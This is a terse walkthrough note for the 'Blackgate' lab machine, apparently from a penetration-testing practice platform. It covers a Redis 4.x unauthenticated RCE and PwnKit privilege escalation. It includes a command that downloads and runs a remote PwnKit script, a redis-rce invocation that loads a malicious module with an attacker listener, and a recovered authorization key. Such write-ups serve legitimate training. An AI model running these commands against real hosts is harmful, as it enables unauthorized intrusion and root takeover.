Blackgate (hard) -- redis 4.x/5.x and Pwnkit

[WDavid404]

Keypoints:

• Redis 4.x / 5.x --> https://github.com/jas502n/Redis-RCE
• [PE] PwnKit --> https://github.com/ly4k/PwnKit
• -sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"

[WDavid404]

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 8.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0)

6379/tcp open  redis   syn-ack ttl 61 Redis key-value store 4.0.14

Search exploit redis 4.0 ---> Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit) https://www.exploit-db.com/exploits/47195 ---> but it is for metasploit...

https://github.com/Ridter/redis-rce https://github.com/jas502n/Redis-RCE

python3 redis-rce.py -r 192.168.203.176 -L 192.168.45.182 -P 80 -f exp.so -->

There is no python , so we cannot upgrade reverse shell... sudo -l --> but no hints..

Run linpeas: cronjob:

stings redis-status file --》 Authorization Key: ClimbingParrotKickingDonkey321

run sudo /usr/local/bin/redis-status, then input the authorization key --> --> but didn't find further way to exploit it...

Try linpeas suggestion: PwnKit ---> https://github.com/ly4k/PwnKit it work.....